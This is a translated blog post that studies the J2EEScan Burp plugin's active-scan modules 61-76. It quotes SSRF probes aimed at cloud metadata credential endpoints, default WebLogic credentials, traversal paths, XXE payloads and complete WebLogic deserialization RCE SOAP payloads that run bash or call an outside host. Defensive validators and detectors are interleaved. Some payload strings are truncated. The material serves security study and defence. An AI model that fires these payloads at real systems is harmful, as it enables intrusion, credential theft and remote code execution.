【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (61-76)

Preface

Installment 11 of the plugin development study series. Previous articles:

【BurpSuite】Plugin Development Study: Log4shell
【BurpSuite】Plugin Development Study: Software Vulnerability Scanner
【BurpSuite】Plugin Development Study: dotnet-Beautifier
【BurpSuite】Plugin Development Study: active-scan-plus-plus
【BurpSuite】Plugin Development Study: J2EEScan (Part 1) - Passive Scanning
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (1-10)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (11-20)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (21-30)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (31-40)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (41-50)
【BurpSuite】Plugin Development Study: J2EEScan (Part 2) - Active Scanning (51-60)

Analysis

【61】SSRFScanner

Addresses:

    private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
            "gopher://localhost:22/".getBytes(),
            "http://[::]:22/".getBytes(),
            "ftp://[::]:22/".getBytes(),
            "ftp://localhost:22/".getBytes(),
            "ftp://0.0.0.0:22/".getBytes(),
            "ftp://0177.0000.0000.0001:22".getBytes(),
            "ftp://0x7f.1:22/".getBytes(),
            "http://spoofed.burpcollaborator.net:22/".getBytes()
    );

These target local port 22.
The match is:

    private static final byte[] GREP_STRING = "OpenSSH".getBytes();

Then it tries the various cloud metadata endpoints:

    private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
        {
            put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        }
    };

The comments here list some cases:

     *
     * Source AWS
     * http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
     *
     * http://169.254.169.254/latest/user-data
     * http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
     * http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME] 
     * http://169.254.169.254/latest/meta-data/ami-id
     * http://169.254.169.254/latest/meta-data/reservation-id
     * http://169.254.169.254/latest/meta-data/hostname
     * http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
     * http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
     *
     * # AWS - Dirs http://169.254.169.254/
     * http://169.254.169.254/latest/meta-data/
     * http://169.254.169.254/latest/meta-data/public-keys/
     *

There are also many summaries online:

http://cn-sec.com/archives/840191.html
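Added here as an example of the defensive counterpart of this module (my code, not the post's or J2EEScan's): a validator for URLs that server-side code is about to fetch on a user's behalf. It parses the permissive IPv4 spellings the probe list above relies on (`0177.0000.0000.0001`, `0x7f.1`, `0.0.0.0`, `[::]`) down to the address they denote and rejects loopback, private, link-local and unspecified addresses, non-HTTP schemes, and the metadata hostnames. The function names and the `BLOCKED_HOSTNAMES` list are assumptions of the example.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hostnames a server-side fetch should never be allowed to reach (list constructed for this example)
BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal"}


def classic_ipv4(host: str):
    """Parse the permissive inet_aton-style forms many HTTP clients accept:
    octal (0177), hex (0x7f) and fewer than four dotted parts (127.1).
    Returns an IPv4Address, or None when the text is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        try:
            if part[:2].lower() == "0x":
                values.append(int(part[2:], 16))
            elif len(part) > 1 and part[0] == "0":
                values.append(int(part, 8))
            else:
                values.append(int(part, 10))
        except ValueError:
            return None
    last = values.pop()                      # the final part fills all remaining bytes
    remaining_bits = 8 * (4 - len(values))
    if any(v > 255 for v in values) or last >= 1 << remaining_bits:
        return None
    number = 0
    for v in values:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << remaining_bits) | last)


def literal_address(host: str):
    """The address a host literal denotes (IPv4 in any spelling, or IPv6), or None for a DNS name."""
    try:
        addr = ipaddress.ip_address(host)     # dotted quads and IPv6 such as '::'
    except ValueError:
        return classic_ipv4(host)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped               # ::ffff:127.0.0.1 is still loopback
    return addr


def is_internal(addr) -> bool:
    """Address ranges a server-side fetch must not reach."""
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def check_outbound_url(url: str):
    """Return (allowed, reason) for a URL the application is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if host.lower() in BLOCKED_HOSTNAMES:
        return False, f"hostname {host} is blocked"
    addr = literal_address(host)
    if addr is None:
        # A DNS name: resolve it yourself, run is_internal() on every resolved address,
        # and connect to that address (not the name again) so a rebinding answer cannot differ.
        return True, "DNS name; re-check after resolution"
    if is_internal(addr):
        return False, f"{host} denotes non-public address {addr}"
    return True, f"public address {addr}"


if __name__ == "__main__":
    for u in ("gopher://localhost:22/", "http://0x7f.1:22/", "http://169.254.169.254/latest/meta-data/",
              "https://example.com/callback"):
        print(u, "->", check_outbound_url(u))
```

For a DNS name the function cannot decide offline; the honest answer is to resolve, check every returned address with `is_internal()`, and then connect to that address rather than to the name, otherwise a second lookup can return a different answer.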

【62】StatusServlet

payload

    private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
            "/status?full=true",
            "/web-console/status?full=true",
            "/server-status?full=true"
    );

If the response is a 401

           if (statusInfo.getStatusCode() == 401) {

then a login endpoint is assumed to exist,
followed by weak-password testing:

                        WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();

If a 200 is matched and the response contains one of the following, it indicates service information disclosure of different kinds:

    private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
    private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();


【63】TomcatHostManager

Tomcat management console exposure, quite common:

    private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
            "/host-manager/html?j2eescan"
    );

Then brute-force.

【64】TomcatManager

Same as 63.

    private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
            "/manager/html"
    );

【65】UndertowTraversal CVE-2014-7816

A JBoss issue.
Payload:

    private static final List<String> JBOSS_PATHS = Arrays.asList(
            "/..\\\\standalone\\\\configuration\\\\standalone.xml"
    );

The match is on the XML that gets read:

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            ".getBytes()
    );
 

【66】URINormalizationTomcat

Unauthorized access to Tomcat:

    private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
            "..;/manager/html",
            "..;/"
    );

Looks familiar: the Shiro authentication bypass uses the same trick.

【67】UTF8ResponseSplitting

Looks like another CRLF injection.
Payload:

    private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();

Match on the response:

        if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {
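Why this "CRLF" probe carries two CJK code points instead of a literal `%0d%0a`: the probe decodes to U+560A and U+560D, and a server that narrows each code point of a header value to one byte emits LF (0x0A) and CR (0x0D) for them, so a filter that looks for `\r\n` in the string before narrowing sees nothing. The example below is mine, not the post's or the scanner's: it models the narrowing, decodes the probe above, and shows a header setter that checks the narrowed form rather than the original string.

```python
from urllib.parse import unquote

# The scanner's INJ value, URL-encoded as it would arrive in a request parameter
PROBE = "%E5%98%8A%E5%98%8DX-Injection:%20test"


def decode_probe() -> str:
    """What the application sees after URL-decoding: two CJK code points, then a fake header line."""
    return unquote(PROBE)


def narrow_to_8bit(value: str) -> bytes:
    """Model the bug the probe relies on: a server that writes each code point of a
    header value as one byte, keeping only its low 8 bits."""
    return bytes(ord(ch) & 0xFF for ch in value)


def is_safe_header_value(value: str) -> bool:
    """True only if the value contains no CR/LF, even after 8-bit narrowing.
    Checking the original string alone would pass U+560A / U+560D."""
    narrowed = narrow_to_8bit(value)
    return b"\r" not in narrowed and b"\n" not in narrowed


def set_header(headers: dict, name: str, value: str) -> dict:
    """Add a response header, refusing (rather than silently stripping) an injectable value."""
    if not is_safe_header_value(value):
        raise ValueError(f"refusing header {name}: value contains CR/LF after narrowing")
    headers[name] = value
    return headers


if __name__ == "__main__":
    decoded = decode_probe()
    print([hex(ord(c)) for c in decoded[:2]])   # the two code points in front of the fake header
    print(narrow_to_8bit(decoded))              # what a narrowing server would write out
    print(is_safe_header_value(decoded))        # False: the value is rejected
```

Rejecting is preferable to stripping here: a stripped value silently changes the redirect or cookie the application meant to set, while a rejection surfaces the injection attempt in the error log.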

【68】WebInfInformationDisclosure

payload

    private static final List<String> WEBINF_PATHS = Arrays.asList(
            "/WEB-INF./web.xml",
            "//WEB-INF/web.xml",
            "/WEB-INF/web.xml",
            "/static/WEB-INF/web.xml", // CVE-2014-0053 
            "/forward:/WEB-INF/web.xml", // spring issue
            "/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
            "/.//WEB-INF/web.xml",
            "/./WEB-INF/web.xml"
    );

match

 private static final byte[] GREP_STRING = ".getBytes();

When testing arbitrary file read, it is also worth trying files of this kind.

【69】WeblogicConsole

Login endpoint path:

    private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
            "/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
    );

match

    private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
            "BEA WebLogic Server Administration Console".getBytes(),
            "<title>Oracle WebLogic Server Administration Console".getBytes(),
            "<TITLE>WebLogic Server".getBytes()
    );
This indicates brute-forcing is possible, and then the brute-force begins:
        List<Map.Entry<String, String>> credentials = new ArrayList<>();
        credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic"));
        credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic1"));
        credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic01"));
        credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "welcome1"));
Rather crude: it only tries 4 weak passwords with a single username.
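Modules 62 to 69 all boil down to "request a known management path, look at the status code, then guess credentials". On the defender's side the same knowledge becomes an access-log rule. The example below is added by me (not from the post or from J2EEScan): it folds the URI tricks the scanner uses (`..;/`, `WEB-INF.`, `//`, `/./`, `;ADMINCONSOLESESSION=`) back to the plain path, flags hits on the probe paths listed in these modules, and reports bursts of 401s from one client to one path that end in a 200. The log lines, the threshold and the path labels are constructed for the example.

```python
import re
from posixpath import normpath

# Plain form of the paths probed by modules 62-69, with a label per module
SENSITIVE_PATHS = {
    "/status": "status servlet",
    "/web-console/status": "status servlet",
    "/server-status": "httpd server-status",
    "/host-manager/html": "tomcat host manager",
    "/manager/html": "tomcat manager",
    "/console/login/loginform.jsp": "weblogic console",
}
BRUTEFORCE_THRESHOLD = 3   # 401s from one client to one path before it counts as a guessing burst

# Common Log Format line: client, identity, user, [timestamp], "request line", status, size
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def normalize_uri(raw: str) -> str:
    """Fold the scanner's evasions back to the plain path: '..;/' path parameters,
    backslashes, '//', 'WEB-INF.' (trailing dot) and '/./' segments; case-fold the result."""
    path = raw.split("?", 1)[0].split("#", 1)[0]
    path = re.sub(r";[^/]*", "", path)                 # '..;/manager' and ';jsessionid=...'
    path = path.replace("\\", "/")                     # Windows-style separators
    path = re.sub(r"/{2,}", "/", path)                 # '//WEB-INF/web.xml'
    path = re.sub(r"(?<=[^/.])\.+(?=/|$)", "", path)   # 'WEB-INF./web.xml'
    path = normpath(path or "/")                       # resolves '/./' and '/../'
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def classify(raw: str) -> list:
    """Reasons a request target deserves attention (empty list if none)."""
    norm = normalize_uri(raw)
    reasons = []
    if norm in SENSITIVE_PATHS:
        reasons.append(SENSITIVE_PATHS[norm])
    elif "/web-inf/" in norm:
        reasons.append("web-inf disclosure")
    if ".." in raw or "\\" in raw:
        reasons.append("traversal attempt")
    return reasons


def analyze_access_log(text: str) -> dict:
    """Scan lines in order; report sensitive-path hits and 401 bursts that later got a 200."""
    hits, guesses = [], {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m["client"], m["target"], int(m["status"])
        reasons = classify(target)
        if reasons:
            hits.append((client, target, normalize_uri(target), status, reasons))
        state = guesses.setdefault((client, normalize_uri(target)), [0, False])  # [401 count, success after burst]
        if status == 401:
            state[0] += 1
        elif status == 200 and state[0] >= BRUTEFORCE_THRESHOLD:
            state[1] = True
    bursts = [(c, p, n, ok) for (c, p), (n, ok) in guesses.items() if n >= BRUTEFORCE_THRESHOLD]
    return {"hits": hits, "bursts": bursts}


# Constructed sample lines, not real traffic
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /manager/html HTTP/1.1" 401 1234
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /manager/html HTTP/1.1" 401 1234
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "GET /manager/html HTTP/1.1" 401 1234
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /manager/html HTTP/1.1" 200 9876
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /static/..;/manager/html HTTP/1.1" 404 200
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /WEB-INF./web.xml HTTP/1.1" 200 812
10.0.0.7 - - [10/Oct/2023:13:56:03 +0000] "GET /..\\standalone\\configuration\\standalone.xml HTTP/1.1" 404 200
10.0.0.7 - - [10/Oct/2023:13:56:04 +0000] "GET /console/login/LoginForm.jsp;ADMINCONSOLESESSION=x HTTP/1.1" 200 4000
10.0.0.9 - - [10/Oct/2023:13:57:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    report = analyze_access_log(SAMPLE_LOG)
    for hit in report["hits"]:
        print("hit:", hit)
    for burst in report["bursts"]:
        print("401 burst:", burst)
```

The normalization is deliberately more aggressive than the server's own, because the point is to compare what the client *tried* against the list, not to reproduce Tomcat's exact routing.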
【70】Weblogic CVE-2019-2725

Vulnerable path:

    private static final List<String> ASYNC_PATHS = Arrays.asList(
            "/_async/AsyncResponseService"
    );
payload
    String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   "
                    + "<soapenv:Header>"
                    + "<wsa:Action>ONRaJntRjNYBc3MJW2JC</wsa:Action>"
                    + "<wsa:RelatesTo>42PlWZ15ODi1hQ3pQ5Ol</wsa:RelatesTo>"
                    + "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
                    + "<void class=\"java.lang.ProcessBuilder\">"
                    + "<array class=\"java.lang.String\" length=\"3\">"
                    + "<void index=\"0\">"
                    + "<string>/bin/bash</string>"
                    + "</void>"
                    + "<void index=\"1\">"
                    + "<string>-c</string>"
                    + "</void>"
                    + "<void index=\"2\">"
                    + "<string>ping -c 3 %s</string>"
                    + "</void>"
                    + "</array>"
                    + "<void method=\"start\"/></void>"
                    + "</work:WorkContext>"
                    + "</soapenv:Header>"
                    + "<soapenv:Body>"
                    + "<asy:onAsyncDelivery/>"
                    + "</soapenv:Body></soapenv:Envelope>";

            // Collaborator context
This is an RCE, probably used a lot during HW exercises.
【71】Weblogic CVE-2017-10271

This one has many more paths to try:

    private static final List<String> WLS_WSAT_PATHS = Arrays.asList(
            "/wls-wsat/CoordinatorPortType",
            "/wls-wsat/CoordinatorPortType11",
            "/wls-wsat/ParticipantPortType",
            "/wls-wsat/ParticipantPortType11",
            "/wls-wsat/RegistrationPortTypeRPC",
            "/wls-wsat/RegistrationPortTypeRPC11",
            "/wls-wsat/RegistrationRequesterPortType",
            "/wls-wsat/RegistrationRequesterPortType11"
    );
payload
    String serializedRce = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"
                    + "<soapenv:Header>"
                    + "<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"
                    + "  <java version=\"1.8\" class=\"java.beans.XMLDecoder\">"
                    + "    <void id=\"url\" class=\"java.net.URL\">"
                    + "      <string>http://%s</string>"
                    + "    </void>"
                    + "    <void idref=\"url\">"
                    + "      <void id=\"stream\" method = \"openStream\" />"
                    + "    </void>"
                    + "  </java>"
                    + "</work:WorkContext>"
                    + "</soapenv:Header>"
                    + "<soapenv:Body/>"
                    + "</soapenv:Envelope>";
This is also an RCE.
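Both payloads share one shape: a `work:WorkContext` SOAP header carrying an XMLDecoder-style document that instantiates `java.lang.ProcessBuilder` or `java.net.URL`, posted to `/_async/` or `/wls-wsat/`. As an added example (my code, not the post's or the scanner's), here is a request inspector a gateway or WAF could run that scores a request on those indicators before it reaches WebLogic; the regexes, the verdict names and the two sample bodies are constructed for the example.

```python
import re

# Endpoints the two modules above post to
WLS_DESERIALIZATION_PATHS = ("/_async/", "/wls-wsat/")

# An XMLDecoder document inside a WorkContext header is the common shape of both payloads
WORKCONTEXT_RE = re.compile(r"<\s*work:WorkContext\b", re.IGNORECASE)
XMLDECODER_RE = re.compile(r'<\s*java\b[^>]*class\s*=\s*"java\.beans\.XMLDecoder"', re.IGNORECASE)
# Classes and methods a legitimate WS-AT / async SOAP message never instantiates or calls
GADGET_RE = re.compile(
    r'<\s*(?:void|object)\b[^>]*class\s*=\s*"(java\.lang\.ProcessBuilder|java\.lang\.Runtime|java\.net\.URL|java\.io\.[A-Za-z]+)"',
    re.IGNORECASE)
METHOD_RE = re.compile(r'<\s*void\b[^>]*method\s*=\s*"(start|exec|openStream|invoke|getRuntime)"', re.IGNORECASE)


def inspect_wls_request(path: str, body: str) -> dict:
    """Score a request against the CVE-2019-2725 / CVE-2017-10271 payload shape.
    Returns the matched indicators and a verdict: 'block', 'review' or 'pass'."""
    indicators = []
    if path.startswith(WLS_DESERIALIZATION_PATHS):
        indicators.append("deserialization endpoint")
    if WORKCONTEXT_RE.search(body):
        indicators.append("WorkContext header")
    if XMLDECODER_RE.search(body):
        indicators.append("XMLDecoder document")
    m = GADGET_RE.search(body)
    if m:
        indicators.append(f"gadget class {m.group(1)}")
    m = METHOD_RE.search(body)
    if m:
        indicators.append(f"method call {m.group(1)}")
    dangerous = any(i.startswith(("XMLDecoder", "gadget", "method")) for i in indicators)
    if "WorkContext header" in indicators and dangerous:
        verdict = "block"                      # header carrying object construction: the exploit shape
    elif dangerous or "WorkContext header" in indicators:
        verdict = "review"                     # one half of the shape on its own
    else:
        verdict = "pass"
    return {"verdict": verdict, "indicators": indicators}


# Constructed sample bodies (not captured traffic)
BENIGN = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
          '<soapenv:Header/><soapenv:Body><ns:Register xmlns:ns="urn:example"><id>42</id></ns:Register>'
          '</soapenv:Body></soapenv:Envelope>')
SUSPICIOUS = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header>'
              '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
              '<java version="1.8" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">'
              '<void method="start"/></void></java></work:WorkContext>'
              '</soapenv:Header><soapenv:Body/></soapenv:Envelope>')

if __name__ == "__main__":
    print(inspect_wls_request("/wls-wsat/CoordinatorPortType", BENIGN))
    print(inspect_wls_request("/_async/AsyncResponseService", SUSPICIOUS))
```

The endpoint on its own is only reported, not acted on: those paths carry legitimate traffic on a patched server, and the signal worth blocking on is the object-construction document inside the header.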
【72】WeblogicUDDIExplorer CVE-2014-4210 ssrf

path

    private static final List<String> UDDI_PATHS = Arrays.asList(
            "/uddiexplorer/"
    );
Matching on these:

    private static final List<byte[]> GREP_SSRF_STRINGS = Arrays.asList(
            "could not connect over HTTP to server:".getBytes(),
            "XML_SoapException: Connection refused".getBytes(),
            "XML_SoapException: Received a response from url".getBytes()
    );
indicates SSRF.

A rather coarse check; in practice you still need to send the specific vulnerability request.
【73】WeblogicWebServiceTestPage CVE-2018-2894

Vulnerable path:

    private static final List<String> WS_TEST_PAGES = Arrays.asList(
            "/ws_utc/config.do"
    );
match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "<title>settings".getBytes()
    );

then the vulnerability exists.

This is a test page allowing arbitrary file upload, with no access control.

【74】XInclude arbitrary file upload

The payload, in one go:

    private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
            "".getBytes());  

【75】XXEModule

payload

    private static final String XXE_DTD_DEFINITION = "]>";

This one echoes the result back (in-band); it looks like a general-purpose module.

【76】XXEParameterModule

payload

    private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
            "]>&xxe;".getBytes(),
            // https://twitter.com/Agarri_FR/status/656440244116574208
            " %dtd;]>]]>".getBytes()
            );

Same idea.
One attacks via a DTD, the other parses and echoes directly.
match

    private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

But a DTD attack is usually not tested with file; using the http protocol is more common, and it can hit a DNSlog.
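Against either of these two modules the fix sits in the parser, not in the response regexes. The example below is mine, not the post's or J2EEScan's: an expat-based parser for untrusted XML that refuses external and parameter entities (the `SYSTEM`/`PUBLIC` and `%dtd;` forms the two payload lists rely on) while still expanding harmless internal entities, so ordinary documents keep working. The `UnsafeXml` name, the returned `{element: text}` shape and the sample documents are constructed for the example.

```python
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """Raised when untrusted XML declares entities that could read files or reach the network."""


def parse_untrusted_xml(xml_text: str) -> dict:
    """Parse XML from an untrusted client with external entity resolution disabled.
    Returns {element: text} for elements that carry text, to show parsing still works."""
    parser = expat.ParserCreate()
    # Never load parameter entities or external DTD subsets: this is the blind '%dtd;' variant
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities (value given inline) are harmless here; anything that points
        # outside the document (a SYSTEM/PUBLIC id) or is a parameter entity is rejected.
        if is_param or system_id is not None or public_id is not None:
            raise UnsafeXml(f"entity {name!r} points outside the document")

    def external_ref(context, base, system_id, public_id):
        raise UnsafeXml(f"external entity reference to {system_id!r}")

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref

    result, stack = {}, []

    def start(tag, attrs):
        stack.append([tag, ""])

    def chars(data):
        if stack:
            stack[-1][1] += data

    def end(tag):
        tag, text = stack.pop()
        if text.strip():
            result[tag] = text.strip()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return result


def accepts(xml_text: str) -> bool:
    """True if the document parses, False if it was rejected as unsafe."""
    try:
        parse_untrusted_xml(xml_text)
        return True
    except UnsafeXml:
        return False


if __name__ == "__main__":
    # Constructed samples: a plain document, an internal entity, and the two rejected forms
    print(parse_untrusted_xml("<order><id>42</id><note>ok</note></order>"))
    print(accepts('<!DOCTYPE r [<!ENTITY greet "hello">]><r><g>&greet;</g></r>'))
    print(accepts('<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///example/path">]><r>&xxe;</r>'))
    print(accepts('<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://example.invalid/x.dtd"> %dtd;]><r/>'))
```

Raising from inside the declaration handler stops expat before the entity is ever referenced, which is why the `file:` and the `%dtd;` documents fail on the declaration line rather than on the reference; a stricter deployment can reject any DOCTYPE outright, which is the equivalent of the `disallow-doctype-decl` feature on JAXP parsers.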
